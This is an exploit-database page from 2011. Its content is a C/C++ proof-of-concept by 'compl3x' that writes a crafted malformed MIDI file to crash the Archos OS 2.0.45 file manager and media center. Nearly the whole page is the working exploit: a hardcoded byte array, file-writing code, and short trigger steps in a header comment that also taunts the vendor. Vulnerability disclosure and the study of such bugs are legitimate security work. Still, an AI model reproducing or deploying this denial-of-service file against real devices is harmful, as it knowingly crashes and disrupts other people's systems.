Archos OS 2.0.45 File Manager MIDI Denial Of Service Exploit



EKU-ID: 763 CVE: OSVDB-ID:
Author: compl3x Published: 2011-07-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#include <stdio.h>

using namespace std;
/*
----------------------------------------------------------------
                                       888  .d8888b.
                                       888 d88P  Y88b
                                       888      .d88P
 .d8888b .d88b.  88888b.d88b.  88888b.  888     8888"  888  888
d88P"   d88""88b 888 "888 "88b 888 "88b 888      "Y8b. `Y8bd8P'
888     888  888 888  888  888 888  888 888 888    888   X88K
Y88b.   Y88..88P 888  888  888 888 d88P 888 Y88b  d88P .d8""8b.
 "Y8888P "Y88P"  888  888  888 88888P"  888  "Y8888P"  888  888
                              888
                              888
                              888
-----------------------------------------------------------------
Title: Archos OS 2.0.45 File Manager MIDI Denial Of Service Exploit
Author: compl3x
Site: compl3x.wordpress.com
Contact: complex@anapnea.net
Twitter: @Complex360
Versions Affected: All (<= 2.0.45)
----------------------------------------------------------------------------------
Oh Archos, Y U NO LIKE MY MIDI?
Copy file to any folder, open it, choose to open with Archos Media
Center
click "ok" on prompt and then press the home button
Also, to Archos: 3 VULNS = 0.0.0.3 added to version, 2.0.4.8. MAKE IT
HAPPEN.
----------------------------------------------------------------------------------
*/


int main(int argc, char **argv)
{
   unsigned char data[] =
   {
   0x4D, 0x54, 0x68, 0x64, 0x00, 0x00, 0x00, 0x06, 0x00, 0x01, 0x00,
0x0B, 0x01, 0x80, 0x4D,
       0x54, 0x72, 0x6B, 0x00, 0x00, 0x00, 0x23, 0x00, 0xFF, 0x58,
0x04, 0x04, 0x02, 0x60, 0x08,
       0x00, 0xFF, 0x7F, 0x03, 0x00, 0x00, 0x41, 0x00, 0xFF, 0x7F,
0x05, 0x00, 0x00, 0x77, 0x0E,
       0x00, 0x00, 0xFF, 0x51, 0x03, 0x07, 0x27, 0x0E, 0x00, 0xFF,
0x2F, 0x00, 0x4D, 0x54, 0x72,
       0x6B, 0x00, 0x00, 0x06, 0xD7, 0x00, 0xB0, 0x00, 0x00, 0x00,
0xC0, 0x00, 0x00, 0xB0, 0x07,
       0x7F, 0x00, 0xFF, 0x59, 0x02, 0x00, 0x00, 0x00, 0x90, 0x4E,
0x64, 0x84, 0x40, 0x80, 0x4E,
       0x00, 0x00, 0x90, 0x4C, 0x64, 0x84, 0x40, 0x80, 0x4C, 0x00,
0x00, 0x90, 0x53, 0x42, 0x42,
       0xFE, 0xFE, 0xFF
   } ;

   printf("\n[+] Archos OS 2.0.45 File Manager MIDI Denial Of Service
Exploit by Complex <<complex@anapnea.net>>");

   if(argc != 2)
   {
       printf("[+] Usage: %s <filename.mid>\n", argv[0]);
       return 0;
   }

   FILE* pFile;
   pFile = fopen(argv[1], "wb");
   if(pFile == NULL)
   {
       printf("[-] Error creating file");
       return 0;
   }

   fwrite(data, 1, sizeof(data), pFile);

   printf("[+] File: \"%s\"\n", argv[1]);
   printf("[+] Written %d bytes\n", sizeof(data));

   fclose(pFile);

   return 0;
}